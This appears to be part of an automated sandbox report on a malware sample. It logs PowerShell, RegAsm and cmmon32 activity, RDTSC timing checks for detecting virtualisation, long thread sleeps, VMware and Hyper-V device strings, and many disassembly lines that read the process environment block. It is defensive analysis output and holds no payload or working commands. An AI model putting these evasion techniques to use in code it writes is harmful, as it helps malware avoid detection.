          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000408A34 second address: 0000000000408A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000408DCE second address: 0000000000408DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000003208A34 second address: 0000000003208A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000003208DCE second address: 0000000003208DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep count: 4119 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3532Thread sleep count: 3084 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -21213755684765971s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -11068046444225724s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 4983 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 4229 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340Thread sleep count: 78 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep time: -24903104499507879s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep count: 3828 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep count: 3230 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6560Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6884Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408D00 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2039
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4119
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3084
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3920
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4368
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3925
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 384
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1367
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4983
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4229
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 783
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 354
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3828
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3230
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 8.5 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.6 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 5.2 %
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: explorer.exe, 0000000A.00000003.563410096.0000000007EFB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
          Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000A.00000000.538181499.0000000006900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000006.00000002.503512245.0000012FE01C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000A.00000000.518268066.0000000007F91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408D00 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02C2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h]
